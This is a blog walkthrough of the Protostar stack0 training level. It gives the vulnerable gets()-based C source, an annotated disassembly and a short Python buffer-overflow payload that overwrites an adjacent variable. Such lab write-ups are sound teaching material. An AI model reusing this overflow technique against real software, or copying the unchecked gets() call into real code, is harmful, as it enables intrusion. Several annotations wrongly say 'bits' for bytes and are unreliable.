Skip to main content

Binary Exploitation Protostar Stack0 - Walkthrough

Hello Guyz,




In This Post, I am going to show you how we can win protostar stack0 level. basically, here Our main Goal is To Understand How A Program Practically Works, And How Can We Understand Every Concept Very Clearly.

Before Starting This Walkthrough. I want to highlight Few Points.

  • I'm not the creator of protostar war game. I am just a player.
  • Here, I am Just providing you hints and reference so, that if you feel stuck anywhere. Take a Look Here.
  • For Practical Hint, Check YouTube Video Given Below.


Source Code :



 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];

  modified = 0;
  gets(buffer);

  if(modified != 0) {
      printf("you have changed the 'modified' variable\n");
  } else {
      printf("Try again?\n");
  }
}


Disassembly Of Main Function (Using GDB)


########################################################################################################
                [ System Has Created Space For 60 Bits In hEx and 96 in Decimal Space On Stack]
########################################################################################################

[-------------------------------------code-------------------------------------]
   0x80483f5 <main+1>: mov    ebp,esp                          <<=== Save Base Pointer Onto Stack 
   0x80483f7 <main+3>: and    esp,0xfffffff0
   0x80483fa <main+6>: sub    esp,0x60                         <<=== This Instruction to Create Space of 96-Bits in Stack,
=> 0x80483fd <main+9>: mov    DWORD PTR [esp+0x5c],0x0         <<=== Here, This Instruction is to Insert 0 Into 92-96 Bits,
   0x8048405 <main+17>: lea    eax,[esp+0x1c]                   <<=== This Instruction is To Copy address of 28 bits starting 
                                                                      point from 96 bits Into EAX registers From There, move it 
                                                                      to stack so That it will work as a argument for get command.
   0x8048409 <main+21>: mov    DWORD PTR [esp],eax              <<=== Copy Eax into stack
   0x804840c <main+24>: call   0x804830c <gets@plt>             <<=== Perform Get Command
   0x8048411 <main+29>: mov    eax,DWORD PTR [esp+0x5c]         <<=== Get Value Of 92-96 bits and move it to EAX register


Situation On Stack



0                        28                                                      92        96
 ============================================================================================
        Other Things     |  Buffer(64)                                           | modified | 
 ============================================================================================
                         ^                                                            ^
                         |                                                            |
                       Get Overwrites from here                                       +
                                                                                  Target Area


Exploit


#!/usr/bin/python

# Total Size Of Buffer In Stack 60c
# 0x80483fa <main+6>: sub    esp,0x60 ==> 96 In Decimal
# 0x8048405 <main+17>: lea    eax,[esp+0x1c] 
# 0x804840c <main+24>: call   0x804830c <gets@plt> 
# 0x80483fd <main+9>: mov    DWORD PTR [esp+0x5c],0x0


payload = 'a'*64             # Buffer Variable Value
payload+= 'b'*4              # Modified Variable Value
# ./bin/stack0 < tmp
print payload



For More Detailed Walk through Check Below Provided YouTube Video Playlist



Comments

Related Post

Top Visited

Create Simple Packet Sniffer Using Python

how to install burp suite in Linux/Ubuntu 16.04

Big List Of Google Dorks For Sqli Injection

List of Keyboard Shortcuts Keys for GNOME Desktop (Kali linux / Linux / Ubuntu/*nix )

How to create Phishing Page Using Kali Linux | Webpage Page Cloning Using Kali Linux Social Engineering Toolkit

Latest Google Dorks List

Best 1000 User-agents List For Web Scraping

How To Install GDB Peda?

What is the use of Pseudo header in TCP/UDP packets?

How To Create Snake Game Using Python And Tkinter - Simple python games